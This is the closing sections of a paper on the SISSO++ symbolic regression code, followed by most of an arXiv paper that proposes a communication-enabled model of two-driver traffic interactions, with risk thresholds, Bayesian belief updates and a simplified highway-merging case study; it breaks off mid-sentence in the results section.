explicitly added in order to ensure that the best one-dimensional model would not be either \(d_{1}\) or \(d_{2}\) in this synthetic problem. Because of this, when using a single residual the SIS subspace size has to be increased to over 400 before \(y\) can be reproduced by SISSO. However, by increasing the number of residuals to 50, SISSO can now find which features are most correlated to the residual of \(d_{1}\) and it immediately finds \(y\). In a recent paper, we further demonstrate this approach's effectiveness for learning models of the bulk modulus of cubic perovskites [28]. ## IV Conclusions In this paper, we described recently developed improvements to the SISSO method and their implementation in the SISSO++ code, both in terms of their mathematical and computational details, which constitute a large leap forward in terms of the expressivity of the SISSO method. Utilizing these features provides greater flexibility and control over the expressions found by SISSO, and acts as a start to introducing "grammatical" rules into SISSO and symbolic regression. In particular, concepts such as the units and ranges of the formula could be extended to prune the search space of possible expressions for the final models. We have also described the implementation of _Parametric SISSO_, which considerably opens up the range of possible expressions found by SISSO. Finally, we discussed two improvements related to the SISSO solver, i.e., a linear programming implementation for the classification problems and the multiple-residuals technique, both providing extended flexibility in the descriptors and models found by SISSO. ## V Acknowledgements T.A.R.P. thanks Christian Carbogno for valuable discussions related to the parametric SISSO scheme and proofreading those parts of the manuscript. T.P. thanks Lucas Foppa for discussions related to the multi-residual approach and proofreading those parts of the manuscript. This work was funded by the NOMAD Center of Excellence (European Union's Horizon 2020 research and innovation program, grant agreement N\({}^{\text{o}}\) 951786), the ERC Advanced Grant TEC1p (European Research Council, grant agreement N\({}^{\text{o}}\) 740233), BigMax (the Max Planck Society's Research Network on Big-Data-Driven Materials-Science), and the project FAIR-mat (FAIR Data Infrastructure for Condensed-Matter Physics and the Chemical Physics of Solids, German Research Foundation, project N\({}^{\text{o}}\) 460197019). T.P. would like to thank the Alexander von Humboldt (AvH) Foundation for their support through the AvH Postdoctoral Fellowship Program. ## VI Conflict of interest statement The authors have no conflicts to disclose. ## VII Author contributions T.A.R.P. implemented all methods and performed all calculations. T.A.R.P. ideated all methods with assistance from LMG. MS and LMG supervised the project. All authors wrote the manuscript. ## VIII Data availability statement The data that support the findings of this study and all scripts used to generate the figures are openly available in FigShare at DOI: 10.6084/m9.figshare.22691857.
2304.06604
A model of communication-enabled traffic interactions
A major challenge for autonomous vehicles is handling interactive scenarios, such as highway merging, with human-driven vehicles. A better understanding of human interactive behaviour could help address this challenge. Such understanding could be obtained through modelling human behaviour. However, existing modelling approaches predominantly neglect communication between drivers and assume that some drivers in the interaction only respond to others, but do not actively influence them. Here we argue that addressing these two limitations is crucial for accurate modelling of interactions. We propose a new computational framework addressing these limitations. Similar to game-theoretic approaches, we model the interaction in an integral way rather than modelling an isolated driver who only responds to their environment. Contrary to game theory, our framework explicitly incorporates communication and bounded rationality. We demonstrate the model in a simplified merging scenario, illustrating that it generates plausible interactive behaviour (e.g., aggressive and conservative merging). Furthermore, human-like gap-keeping behaviour emerged in a car-following scenario directly from risk perception without the explicit implementation of time or distance gaps in the model's decision-making. These results suggest that our framework is a promising approach to interaction modelling that can support the development of interaction-aware autonomous vehicles.
O. Siebinga, A. Zgonnikov, D. A. Abbink
2023-04-13T15:15:32Z
http://arxiv.org/abs/2304.06604v1
# A model of communication-enabled traffic interactions ###### Abstract A major challenge for autonomous vehicles is handling interactive scenarios, such as highway merging, with human-driven vehicles. A better understanding of human interactive behaviour could help address this challenge. Such understanding could be obtained through modelling human behaviour. However, existing modelling approaches predominantly neglect communication between drivers and assume that some drivers in the interaction only respond to others, but do not actively influence them. Here we argue that addressing these two limitations is crucial for accurate modelling of interactions. We propose a new computational framework addressing these limitations. Similar to game-theoretic approaches, we model the interaction in an integral way rather than modelling an isolated driver who only responds to their environment. Contrary to game theory, our framework explicitly incorporates communication and bounded rationality. We demonstrate the model in a simplified merging scenario, illustrating that it generates plausible interactive behaviour (e.g., aggressive and conservative merging). Furthermore, human-like gap-keeping behaviour emerged in a car-following scenario directly from risk perception without the explicit implementation of time or distance gaps in the model's decision-making. These results suggest that our framework is a promising approach to interaction modelling that can support the development of interaction-aware autonomous vehicles. _Keywords--_ Driving Interactions, Driver Modelling, Traffic Communication ## 1 Introduction Autonomous vehicles (AVs) hold the potential to help address major societal challenges related to mobility and sustainability. However, one of the major open problems in autonomous vehicle development is safely and acceptably dealing with driving scenarios that require _two-way interaction_ with human road users. In these interactions, such as in highway merging or intersection negotiation, both vehicles reciprocally influence and respond to the actions of each other. It entails quick and sometimes iterative negotiations, based on communication (see e.g., [1, 2, 3]) that can either be implicit (vehicle motions) or explicit (e.g., honking, signalling). The continuous dynamics of a two-way interaction govern safety, priority (who goes first, who gives way), and acceptance (by passengers and other road users). For example, drivers can be misunderstood or cause annoyance by being too conservative or aggressive (interfering with, or ignoring others' communication). Therefore, fundamental knowledge about continuous human two-way interactions is necessary to develop and evaluate safe and acceptable AV behaviour for these scenarios. However, this fundamental knowledge about the dynamics of interactions is currently lacking. We advocate using a modelling approach for human two-way traffic interactions to develop the fundamental understanding that in the future can help design better AV behaviour. Modelling is a common way of gaining an understanding of human driving behaviour. But it has so far mostly been done with a focus on single-driver behaviour, either in single-vehicle (e.g., [4, 5]), or multi-vehicle scenarios such as car following [6, 7], lane changing [8, 9], and gap acceptance [10, 11]. Most multi-vehicle approaches assume that the modelled driver responds to other traffic participants, but that they don't respond in turn. 
For example, car-following models assume that the following driver responds to the leading vehicle, but this leading vehicle does not change its behaviour based on the follower's actions. We call this the _one-way interaction_ assumption. This assumption disentangles the behaviours of the multiple drivers and thereby enables the researchers to better understand and model the behaviour of the driver of interest. The scope of these models is thus deliberately restricted to a single driver. This one-way interaction assumption is justified for car-following models and the likes, but not for interactive driving scenarios like merging or intersection negotiations, which are inherently reciprocal. Simply joining two one-way interaction models to describe an interaction will neglect the drivers' beliefs about the other's future actions and their expected influence on it. Furthermore, it also neglects the presence and effects of communication between the drivers. Therefore, we argue that the scope of an interaction model should include all participants to begin with. The current mainstream approach to modelling complete traffic interactions (as opposed to individual drivers) is using game theory. Game theory was developed as a framework to describe two-way interactions between players in abstract games. It has been used extensively to model traffic interactions. The first model of human merging behaviour based on game theory was proposed in 1999 by Kita [12]. In 2007, Liu et al. improved the game theoretical approach by removing the assumption of constant velocity [13]. After that, many works followed (e.g. [14, 15, 16, 17]). However, applying game theory to model dynamics between two drivers is not trivial, because game theory makes three strong assumptions about these players. First, the assumption that all players rationally maximize some utility function. Empirical evidence has shown that even in simple economic games [18], but also in driving behaviour [19] and traffic interactions [20], this assumption does not hold for human players. Second, game theory does not allow communication between the players, an aspect known to be important in interactive driving scenarios [3]. Third, the majority of game-theory-based interaction models use a set of discrete actions for the drivers. Although this is useful to describe the higher-level tactical [21] decisions of drivers accurately (for example the decision to yield or merge), it does not describe the lower-level operational [21] dynamics of the interaction (e.g. changes in velocity or trajectory). Therefore, these approaches are not sufficiently detailed for developing safe and acceptable AV behaviour. Combined, these three limitations motivate the need for an alternative approach to modelling two-way traffic interactions that allows for communication, bounded rationality, and continuous dynamic actions. To address this gap, here we propose a framework for Communication-Enabled-Interaction (CEI) modelling. It can be used to create model implementations, of which we provide one example in a case study1. The modelling framework relaxes the common assumptions that drivers are rational agents and have full information about the strategies of other drivers. It is based on the notion that all drivers have a plan they want to execute and a belief about what other drivers are going to do. Combined, this plan and belief result in a perceived risk for every driver. The drivers are assumed to act to keep this risk below their individual threshold. 
The key insight of the framework is that the beliefs about others are updated based on communication between the agents. In a simulation case study, we show that an implementation of a CEI-model produces plausible behaviour of two interacting drivers in a simplified merging scenario. Besides that, human-like gap-keeping behaviour emerges directly from the notion of risk perception. These results show that the proposed modelling framework provides a promising new approach for modelling human-human driver interactions. Footnote 1: The software implementation of the presented model and its simulation environment are available online at [22]. The data discussed in the results section can be found at [23]. ## 2 Communication-Enabled Interaction (CEI) Modelling We propose a framework to model human-human traffic interactions between two drivers. This framework puts the modelling scope around the complete interaction rather than a single driver, and explicitly includes communication between the drivers. Each driver is described by four components: a notion of risk, a deterministic plan (for their own behaviour), a means of communication, and a probabilistic belief about the future actions of the other driver (Figure 1). The general framework we present here only defines loose requirements for these components. When implementing the model for a specific scenario or use case, these components can be designed based on existing literature (e.g., from the fields of human behaviour modelling, traffic communication, intent inference, or vehicle path planning). The advantage of this is that one can leverage knowledge from the literature to improve the model, without having to fully redesign it. In this section, we will discuss the four components and our reasoning behind them. The assumptions and requirements that need to be taken into account when implementing a model based on this framework will also be discussed per component. In Section 3, we will illustrate how each component can be implemented in an example implementation for a simplified merging scenario. ### Framework components #### Risk-Based Re-plan Recent research has shown that risk plays an important role in human driving behaviour [4, 24, 25]. In our framework, we combine this notion of risk-based decision making in driving with Simon's ideas of _bounded rationality_[26] and _satisficing_[27]. _Bounded rationality_ implies that humans are not capable of fully optimizing their behaviour all the time. _Satisficing_ (a portmanteau of _satisfy_ and _suffice_) is an example of bounded rationality in which humans are assumed to not continuously search for an optimal solution. Instead, they are _satisfied_ with a "good enough" solution that _suffices_. We reason that the only solutions that suffice and satisfy in a driving interaction are the ones that are _subjectively safe enough_. To formalize these ideas, and combine them in a framework, we hypothesize that drivers act to keep their perceived risk below their risk threshold. Using such a threshold incorporates Simon's ideas in two ways. First, it defines what solutions are subjectively safe enough. Second, it limits (or bounds) the cognitive capacities (or effort) required from the driver because it allows the driver to only rethink their plan when the situation changed and the current plan does not suffice or satisfy anymore. This is what we call a _risk-based re-plan_ (Figure 1). 
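To make the per-driver component structure of Figure 1 a little more concrete, here is a minimal data-structure sketch of how a driver's state could be represented; the class and field names (`BeliefPoint`, `DriverState`) are illustrative choices of ours and are not taken from the paper's released implementation.

```python
from dataclasses import dataclass, field
from typing import List, Tuple

@dataclass
class BeliefPoint:
    t: float      # time in the future [s]
    mu: float     # believed mean position of the other driver [m]
    sigma: float  # uncertainty (standard deviation) about that position [m]

@dataclass
class DriverState:
    risk_threshold: float                                          # individual upper risk threshold
    plan: List[Tuple[float, float]] = field(default_factory=list)  # deterministic (time, position) waypoints
    belief: List[BeliefPoint] = field(default_factory=list)        # probabilistic belief about the other driver
    observed_velocity: float = 0.0                                 # latest implicitly communicated signal

# a driver with a higher threshold tolerates more risk before re-planning ("more aggressive")
aggressive = DriverState(risk_threshold=0.6)
conservative = DriverState(risk_threshold=0.4)
print(aggressive.risk_threshold > conservative.risk_threshold)
```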
By incorporating these ideas, we step away from the fundamental assumption of game theory that humans are rational utility maximizers and move towards a formulation that allows for team effort and mutual goals.
Figure 1: An overview of the proposed Communication-Enabled-Interaction (CEI) modelling framework. This framework is designed to capture the two-way interaction between two drivers, rather than the one-way interaction behaviour of one driver with respect to another. Each driver has a _plan_ for their own behaviour. Plan updates are triggered based on a _risk threshold_ and a _risk estimate_ arising from a _belief_ of how the other driver will move over time. Each driver _communicates_ their plan (intention) either implicitly (e.g., through vehicle motion), or explicitly (e.g., through light signals) to the other driver. This communication links one driver's plans to the belief of the other and can be divided into three components denoted _*A_, _*B_, and _*C_. _*A_ represents the mapping of a driver's plan to its communication, _*B_ represents the means of communication, and _*C_ denotes the belief update of the other driver based on the received communication.
In summary, our framework assumes that every driver evaluates the risk of their current deterministic plan, given their probabilistic belief about what other drivers are planning to do. Risk perception can be based on a number of factors, such as high velocity, high acceleration, or the probability of a collision. This evaluation happens continuously, but drivers will only perform a re-plan if the perceived risk exceeds their threshold. This should result in drivers with a low risk threshold adapting their plan in an early stage of the interaction to reduce the estimated risk. At the same time, drivers with a high risk threshold will instead continue their current plan and take advantage of the fact that the risk of the situation is lowered by the other driver. Intuitively this can be explained as the driver with the higher risk threshold being more aggressive. #### Plan The second component in our framework is the _plan_. We assume that drivers have a deterministic plan about the actions they will take in the immediate future. In the framework, this plan takes the form of a deterministic set of waypoints over a limited time horizon. This time horizon should be long enough to include (part of) the interaction. The construction of this plan (i.e., the planning algorithm) should only consider features that are not related to risk and safety (e.g., desired velocity or comfort), as the perceived risk is constantly evaluated separately to determine if the current plan still suffices and satisfies. This evaluation is done taking into account both the plan and the belief. When re-planning, the risk threshold should be used as a constraint in the planning algorithm. As long as such a constraint can be imposed, the plan can be constructed using any suitable path-planning algorithm. #### Communication One of the key concepts of the framework is that drivers actively communicate their plan to other drivers. This assumption is based on field studies on human-human traffic interaction that confirm that traffic participants actively communicate their plan both explicitly and implicitly to others (e.g. [3]). Experiments on other (non-driving) tasks that require team effort have shown that humans use their movement actions to coordinate with their team member [28] (which is a form of implicit communication).
The assumption of communication can also be effectively used to model human behaviour in those tasks [29]. Finally, in simulation, communication can be beneficial for controlling co-bots that navigate among humans [30], resulting in fewer dead-lock situations. In summary, previous research suggests that humans communicate in traffic and that the assumption of communication can be used both for the effective modelling of human teamwork behaviour and the effective control of robots. In the CEI modelling framework, communication links the plan of one driver to the belief of the other driver. In practice, this means that three aspects of communication need to be designed when implementing a CEI-model. First, one needs to determine the mode of communication; What signals are used to communicate? These signals can be explicit (e.g., turn indicators) or implicit (e.g., velocity, heading angle, or acceleration). Second, a mapping from a plan to its communication is required. This can be as simple as just executing the plan, but one could come up with more elaborate mappings based on traffic communication studies such as slowing down, purely to communicate that the other driver can go first (for an example of modelling such exaggerated trajectories in a bottle grasping task, see [29]). Finally, a mapping from communication to belief is needed, this mapping specifies how a probabilistic belief is updated based on the received communication. #### Belief Both drivers are assumed to have probabilistic beliefs about what the other driver will do in the near future. This belief consists of a number of points over a time horizon. Each of these belief points is represented by a probability distribution over positions for the other driver for that specific time in the future (Figure 1). This assumption is based on the intuition that human drivers have a general but uncertain idea about what other drivers are planning to do, a concept that has been successfully applied in other modelling frameworks such as belief-desire-intention programming (based on [31]) and (Bayesian) theory of mind [32] as well. When implementing the belief part of the CEI-model, the only requirement is that the chosen probability distribution can be updated using new information (coming from the observed communication). In practice, this means that most parametric probability distributions are suitable because they can be updated with methods such as Bayesian updates. ## 3 Case Study: an Example of an Implementation To demonstrate the feasibility of the proposed model framework and to investigate the effects of design choices (parameters) on model behaviour, we have implemented a CEI-model for a simplified merging scenario. In this case study, we show that even with simple components the model framework can produce plausible, human-like interactive behaviour. At the same time, it is not the purpose of this case study to quantitatively assess the model's consistency with human behaviour. Such an assessment using fine-grained data on the interactive behaviour of two drivers requires a detailed investigation and is therefore left for future work. ### Simplified merging scenario For this case study, we used a simplified symmetric merging scenario (Figure 2). In this scenario, two vehicles approach a merge point on a predefined track. The model can directly control the acceleration of the vehicles, but there is no steering involved. The vehicles have a rectangular bounding box for collision detection. 
The heading of the vehicles is pre-defined and always corresponds to the heading of the road. At the merge point, the heading of the vehicles changes instantly. The vehicles in the simplified scenarios are subject to a negative acceleration due to resistance and drag. The net acceleration (\(a^{net}\)) is the applied input (\(a^{in}\)) minus the negative acceleration \(a^{r}\) (a function of the vehicle's velocity \(v\)): \[a^{net}(v) =a^{in}-a^{r}(v),\,\text{where} \tag{1}\] \[a^{r}(v) =\alpha v^{2}+\beta. \tag{2}\] Parameters \(\alpha\) and \(\beta\) define the magnitude of the drag and constant resistance (\(\alpha=0.0005\) and \(\beta=0.1\)). Besides the resistance, the vehicles have a maximum acceleration \(a^{max}=2.5\ \frac{m}{s^{2}}\), which is the same for positive and negative accelerations. The velocity of the vehicles is restricted to non-negative values. The simulation updates all dynamics at a rate of \(20\ Hz\).
Figure 2: A top-down view of the simplified merging scenario as used in the case study, rotated 90 degrees clockwise. Vehicles follow pre-defined paths (road centres) that merge at a pre-defined merge point. Vehicles have a two-dimensional body (\(4.5\ m\) x \(1.8\ m\)) and their headings change instantly at the merge point. The model controls the accelerations of the vehicles directly. The dimensions of the track are defined by two parameters. Distance \(l_{a}\) (\(25\ m\)) denotes the distance between the start points of the vehicles. Distance \(l_{b}\) (\(50\ m\)) is the distance to travel from the start point until the merge point, and from the merge point until the end of the track.
### Plan The planning part of the model consists of a path planning algorithm that minimizes the following cost function: \[c=\sum_{n=1}^{N}(v_{n}-v^{d})^{2}+(a_{n}^{in})^{2}. \tag{3}\] Here, \(n\) denotes the time step and \(v\) the vehicle's velocity. This cost function includes terms for minimizing the squared input \(a^{in}\) and for travelling at a desired velocity \(v^{d}\). The path is planned at the same frequency as the simulation (\(20\ Hz\)) and is subject to a time horizon of \(4\ s\) (\(N=\frac{4}{0.05}=80\)). A visual example of the plan, belief, and risk perception is shown in Figure 3. When initially planning the path, the cost function of Equation 3 is minimized, so an optimal path is found with respect to comfort and speed (Figure 3-A). If, at the next time step, the current plan still satisfies (i.e., the risk threshold is not exceeded), the current plan is continued. We assume that maintaining velocity at the final time step is the practical equivalent of maintaining the current plan. When the risk threshold is exceeded, the cost function is minimized again to find a new plan (Figure 3-C). This time the minimization is subject to a risk constraint. Based on the ideas of satisficing, we hypothesize that humans do not spend unlimited effort to find an optimal plan, but instead search for a new solution that satisfies and suffices. We hypothesize that re-planning is easiest (i.e., requires the least effort) if the new plan is close to the previous plan (i.e., uses the same strategy). Therefore, the re-planning optimization is executed with the old plan as the initial condition. When using a gradient descent algorithm, this will result in a solution that is close to the previous plan while the risk constraint is met.
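As an illustration of the pieces just described, here is a small, self-contained sketch of the longitudinal dynamics of Equations (1)-(2) and of the planning cost of Equation (3). The choice of optimizer (SLSQP with box bounds on the acceleration input) and all variable names are assumptions made for this sketch; the paper does not state how the minimization is carried out. During a re-plan, a risk constraint could be passed to the same call as an additional inequality constraint.

```python
import numpy as np
from scipy.optimize import minimize

ALPHA, BETA = 0.0005, 0.1   # drag and constant resistance, Eq. (2)
A_MAX = 2.5                 # maximum |acceleration| [m/s^2]
DT = 1.0 / 20.0             # simulation step, 20 Hz
N = 80                      # 4 s horizon at 20 Hz

def rollout_velocities(v0, a_in):
    """Integrate v under a_net = a_in - (alpha*v^2 + beta), clipped at v >= 0 (Eqs. 1-2)."""
    v, vs = v0, []
    for a in a_in:
        a_net = a - (ALPHA * v**2 + BETA)
        v = max(v + a_net * DT, 0.0)
        vs.append(v)
    return np.array(vs)

def plan_cost(a_in, v0, v_desired):
    """Cost of Eq. (3): deviation from the desired velocity plus squared input."""
    vs = rollout_velocities(v0, a_in)
    return np.sum((vs - v_desired) ** 2 + np.asarray(a_in) ** 2)

# plan from an initial velocity of 10 m/s towards a desired velocity of 10 m/s
res = minimize(plan_cost, x0=np.zeros(N), args=(10.0, 10.0),
               bounds=[(-A_MAX, A_MAX)] * N, method="SLSQP")
print(res.fun, res.x[:3])
```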
For example, if the current plan is to decelerate and pass behind the other driver, the most likely outcome of the re-planning will be to decelerate even more and increase the gap. This will lower the perceived risk while using the current strategy. If the optimization with the current plan as the initial condition does not succeed, three other initial conditions are considered: full braking at all time steps, no acceleration input at all time steps, and full acceleration at all time steps. The candidate plan with the lowest cost is used as the initial condition for a second re-plan. This can result in a change of strategy, but only if the current strategy is not feasible anymore. For example, if the driver was decelerating but decelerating even more would not reduce the risk enough, they will investigate whether accelerating reduces the risk and change their strategy if needed. ### Belief The belief is kept as a sequence of probability distributions over positions for the other vehicle, each at a specific point in time (Figure 3-A). This sequence of belief points uses the same time horizon as the planning part of the model (\(4\)\(s\)) but contains fewer points for simplicity. Belief points are kept at a \(4\)\(Hz\) frequency (this number was based on an initial evaluation of the model), resulting in a sequence of \(4\cdot 4=16\) points. Each belief point is represented by a Gaussian distribution. The Gaussian distributions are initialized by combining the initial velocity and position of the other vehicle with the maximum bounds of acceleration. To initialize a belief point, the mean of the Gaussian is set to the position that corresponds to the other driver maintaining its current velocity. To calculate the standard deviation, an upper and lower position bound (\(ub\) and \(lb\)) are used. These are calculated by predicting the position of the other vehicle if it would apply the maximum and minimum possible acceleration continuously. The standard deviation is then calculated as the difference between the bounds and the mean divided by 3 (\(\sigma=\frac{ub-\mu}{3}\)). The factor \(\frac{1}{3}\) is based on the fact that \(99.73\%\) of the area under a normal distribution corresponds to \(\mu\pm 3\sigma\). Once the simulation time is equal to the timestamp corresponding to the first belief point, this point is removed from the sequence and a new point is initialized. ### Communication Human communication during driving is a complex topic on which a lot of research has been done. Thus, there is much potential for including complex communication models based on empirical evidence in a CEI-model. However, for this initial investigation of the modelling framework, we used a simple implicit communication model that does not include any explicit communication signals (e.g., turn indicators). We only use velocity and position as communication signals. These two values are assumed to be constantly observed by the other driver without any errors or noise. When sending communication, the drivers do not use a mapping from their current plan to the actions they take. Instead, they just take the next action from their plan. When receiving communication, drivers use a constant velocity model combined with bounds of comfortable acceleration to update their belief. All belief points are updated every time step using Bayesian updating.
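A minimal sketch of this belief-point initialization is given below. The 16 points over a 4 s horizon and the maximum acceleration of 2.5 m/s² follow the text; the function and variable names are ours, and only the upper bound is used for the standard deviation, as in the description above.

```python
import numpy as np

A_MAX = 2.5  # maximum acceleration magnitude [m/s^2], from the scenario description

def init_belief_point(x_other, v_other, t):
    """Gaussian belief (mu, sigma) over the other vehicle's position t seconds ahead."""
    mu = x_other + v_other * t                       # constant-velocity prediction
    ub = x_other + v_other * t + 0.5 * A_MAX * t**2  # continuous maximum acceleration for t seconds
    sigma = (ub - mu) / 3.0                          # ~99.7% of the mass lies within the bounds
    return mu, sigma

# one belief point every 0.25 s over a 4 s horizon (16 points), as in the case study
horizon = np.arange(0.25, 4.0 + 1e-9, 0.25)
belief = [init_belief_point(x_other=0.0, v_other=10.0, t=t) for t in horizon]
print(belief[0], belief[-1])
```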
Figure 3: An example to illustrate the plan and the belief of the model. a) shows four (of 80) deterministic plan points along the one-dimensional track. These are the planned centre positions of the own vehicle at four points in time. The distributions represent the believed centre position of the other vehicle at the same four (of 16) points in time, where colours denote the points in time. b) shows these plan and belief points after a single belief update. This update increased the certainty of the belief about the other vehicle's position. The belief is updated at every time step. c) shows the risk evaluation for one of the points. To evaluate the risk, the probability of a collision (\(p_{c}\)) is evaluated by calculating the probability that the other vehicle will be within the bounds of collision for the given planned position. This risk evaluation is done at every time step for all belief points. If the maximum perceived risk value exceeds the upper risk threshold, a re-plan is triggered. This re-plan uses the perceived risk as a constraint for the optimization. To lower the risk, the planned position could be moved in the direction of the black arrow.
#### 3.4.1 Updating the Belief For Bayesian updating, the previous belief point serves as the prior distribution, and the resulting posterior is adopted as the updated belief point (Figure 3-B). The likelihood is constructed using the constant-velocity model. We assume the likelihood to be a Gaussian distribution where the standard deviation is constant and known. This means the likelihood and prior form a conjugate pair, meaning that the posterior will also be a Gaussian distribution of which the \(\mu\) and \(\sigma^{2}\) have a closed-form solution. The likelihood function for the belief point at time \(t\) is defined as follows: \[\mathcal{N}\left(\mu=\frac{p}{t},\sigma^{2}=\left(\frac{a_{c}t}{6}\right)^{2}\right) \tag{4}\] In this equation, \(p\) denotes a position sampled from the prior (the previous belief point), \(t\) denotes the time corresponding to the belief point, and \(a_{c}\) is the maximum comfortable acceleration (\(a_{c}=1.0\ \frac{m}{s^{2}}\)). The same value is used for positive and negative accelerations, thus the distribution is symmetrical. The likelihood function describes the probability of observing a velocity \(v\) (now) given a sampled predicted position \(p\) (at time \(t\)) from the prior belief. The mean \(\mu\) corresponds to constant velocity, and \(\sigma\) is determined based on the assumption that \(99.73\%\) of the distribution falls within the bounds of comfortable acceleration. With this likelihood function, the posterior has a closed-form solution. We denote the prior as \(\mathcal{N}(\mu_{0},\sigma_{0}^{2})\) and the posterior as \(\mathcal{N}(\mu_{1},\sigma_{1}^{2})\). When updating with a single data point \(v\), the solution for the posterior becomes\({}^{2}\): Footnote 2: For a complete derivation of this closed-form solution, see the supplementary material. \[\mu_{1}=\frac{\mu_{0}\sigma^{2}+v\sigma_{0}^{2}\frac{1}{t}}{\sigma^{2}+\sigma_{0}^{2}\frac{1}{t^{2}}} \tag{5}\] \[\sigma_{1}^{2}=\frac{\sigma^{2}\sigma_{0}^{2}}{\sigma^{2}+\sigma_{0}^{2}\frac{1}{t^{2}}} \tag{6}\] ### Risk The risk perceived by the drivers is assumed to be proportional to the probability of a collision. Other aspects (i.e., high velocity and high acceleration) are assumed not to contribute to the perceived risk for simplicity. To estimate the probability of a collision, we define the concept of _bounds of collision_ (Figure 3-C).
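The closed-form update of Equations (5)-(6) is compact enough to sketch directly; the numeric example at the end and the variable names are purely illustrative and not taken from the paper's implementation.

```python
A_C = 1.0  # maximum comfortable acceleration [m/s^2], used in the likelihood of Eq. (4)

def update_belief_point(mu0, sigma0, v_observed, t):
    """Bayesian update of one Gaussian belief point from an observed velocity (Eqs. 4-6)."""
    sigma_lik = A_C * t / 6.0                                   # likelihood std, Eq. (4)
    den = sigma_lik**2 + sigma0**2 / t**2
    mu1 = (mu0 * sigma_lik**2 + v_observed * sigma0**2 / t) / den   # Eq. (5)
    var1 = (sigma_lik**2 * sigma0**2) / den                         # Eq. (6)
    return mu1, var1**0.5

# example: a belief point 2 s ahead with prior mu = 20 m, sigma = 1.5 m, observed v = 9 m/s;
# the posterior mean is pulled towards the constant-velocity prediction of 18 m
print(update_belief_point(20.0, 1.5, 9.0, 2.0))
```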
These are the extreme positions of the other vehicle that would result in a collision, given the position of the own vehicle. These bounds are calculated for every point in the driver's plan. For example, if we know the driver will be at position \(x\) at time \(t\), we can use the vehicles' dimensions to calculate that a collision will occur if and only if the other vehicle is at a position between \(x+c_{1}\) and \(x-c_{2}\) at the same time; these are the bounds of collision. The believed probability that the other vehicle will be within these bounds at that time can be calculated using the belief about the other vehicle's position. This probability is then equal to the probability of a collision at that time. The perceived risk for a complete plan is determined by taking the maximum risk over all belief points. A re-plan is triggered if the perceived risk exceeds an upper threshold \(\rho_{u}\). Only using the upper threshold, however, poses a potential problem when the merging conflict is resolved because after that there will be no triggers to re-plan anymore. This might cause vehicles to stall or drive very slowly for no reason. We avoid this by extending the risk module with a lower risk threshold \(\rho_{l}\) and a saturation time \(\tau\). If the perceived risk is lower than \(\rho_{l}\) and the last update was longer than \(\tau\) ago, a re-plan is also triggered. When a re-plan optimization is performed, the perceived risk is constrained to be lower than the average of the two thresholds. For the implementation of this constraint, the instant heading change at the merge point in the track posed a problem. Therefore, a linear approximation of the bounds of collision is used. ### Investigated Scenarios In total, every driver in the model has four parameters that determine their behaviour: a desired velocity \(v_{d}\), an upper risk threshold \(\rho_{u}\), a lower risk threshold \(\rho_{l}\), and a saturation time \(\tau\). Besides these parameters, the initial velocity and position (\(v_{0}\) and \(x_{0}\)) of the drivers can also be adjusted. Both drivers always start from the beginning of the track. In the case study, we investigate the effect of these parameters and the effect of differences in the initial condition in four scenarios (Table 1). The first two scenarios (A & B) manipulate the initial and desired velocity of the right driver while keeping the parameters of the left driver fixed; the drivers here have the same risk thresholds. In scenario A, the drivers are not expected to be on a collision course if they would stick to their desired velocity, but in scenario B, they are. Scenarios C & D focus on the risk thresholds. Scenario C investigates the effect of a difference in risk thresholds between drivers. Scenario D investigates the sensitivity of model behaviour to variations of these thresholds in one of the drivers. The saturation time \(\tau\) only affects the behaviour after the conflict is resolved, therefore it is kept constant at 2.0 \(s\) for all scenarios. 
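A minimal sketch of this risk evaluation and of the two-threshold re-plan trigger is shown below. The default thresholds (\(\rho_{l}=0.2\), \(\rho_{u}=0.5\)) and the saturation time (\(\tau=2.0\ s\)) follow the text and Table 1; the collision half-lengths `c1` and `c2` are illustrative placeholders rather than the paper's exact bounds-of-collision computation.

```python
from math import erf, sqrt

def normal_cdf(x, mu, sigma):
    return 0.5 * (1.0 + erf((x - mu) / (sigma * sqrt(2.0))))

def collision_probability(x_plan, belief_point, c1=4.5, c2=4.5):
    """Probability that the other vehicle lies between x_plan - c2 and x_plan + c1."""
    mu, sigma = belief_point
    return normal_cdf(x_plan + c1, mu, sigma) - normal_cdf(x_plan - c2, mu, sigma)

def perceived_risk(plan_positions, belief_points):
    """Maximum collision probability over all (plan point, belief point) pairs."""
    return max(collision_probability(x, b) for x, b in zip(plan_positions, belief_points))

def needs_replan(risk, time_since_replan, rho_u=0.5, rho_l=0.2, tau=2.0):
    """Re-plan when the upper threshold is exceeded, or when risk is low and tau has passed."""
    if risk > rho_u:
        return True
    return risk < rho_l and time_since_replan > tau

plan = [10.0, 20.0, 30.0, 40.0]                                # planned own positions [m]
belief = [(12.0, 1.0), (22.0, 2.0), (33.0, 3.0), (45.0, 4.0)]  # (mu, sigma) per belief point
risk = perceived_risk(plan, belief)
print(risk, needs_replan(risk, time_since_replan=1.0))
```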
\begin{table} \begin{tabular}{|c|c c|c c c|c|} \cline{2-7} \multicolumn{1}{c|}{} & Side & \(\rho_{l}\) & \(\rho_{u}\) & \(v_{0}\) & \(v_{d}\) & \(x_{0}\) \\ \hline Units & - & - & - & \(\frac{m}{s}\) & \(\frac{m}{s}\) & \(m\) \\ \hline Condition A: & left & 0.2 & 0.5 & 10.0 & 10.0 & 0.0 \\ No expected collision & right & 0.2 & 0.5 & **9.0** & **9.0** & 0.0 \\ \hline Condition B: & left & 0.2 & 0.5 & 10.0 & 10.0 & 0.0 \\ On a collision course & right & 0.2 & 0.5 & **9.0** & **9.0** & **1.2** \\ \hline Condition C: & left & 0.2 & **0.4** & 10.0 & 10.0 & 0.0 \\ High and low thresholds & right & **0.3** & **0.6** & 10.0 & 10.0 & 0.0 \\ \hline Condition D: & left & **0.3** & **0.4** & 10.0 & 10.0 & 0.0 \\ Threshold sensitivity & right & **0.3** & **0.6** & 10.0 & 10.0 & 0.0 \\ \hline \end{tabular} \end{table} Table 1: Parameters of the investigated scenarios. Bold values denote deviations from the default values. \(\rho_{l}\) and \(\rho_{u}\) denote the lower and upper risk thresholds. \(v_{0}\) and \(v_{d}\) are the initial and desired velocity, respectively. \(x_{0}\) denotes the initial position of the vehicle along the track. ## 4 Results ### Scenario A: No expected collision Scenario A serves as a baseline scenario. Here, both drivers have an initial velocity that is equal to their desired velocity, but that differs from the velocity of the other driver (Table 1). If they were to keep their initial (desired) velocity up until the merge point, no collision would occur. The left driver would pass the merge point first with a small distance gap of 0.2 \(m\). Therefore we would expect a rational optimizing model (that does not explicitly include human-like gap-keeping) to maintain the desired velocity all the way. A behaviour expected from human drivers, on the other hand, is to increase this small safety margin. In an empirical study [33], it was found that human drivers in the Netherlands merged on three different highway locations with mean headways of 12.6, 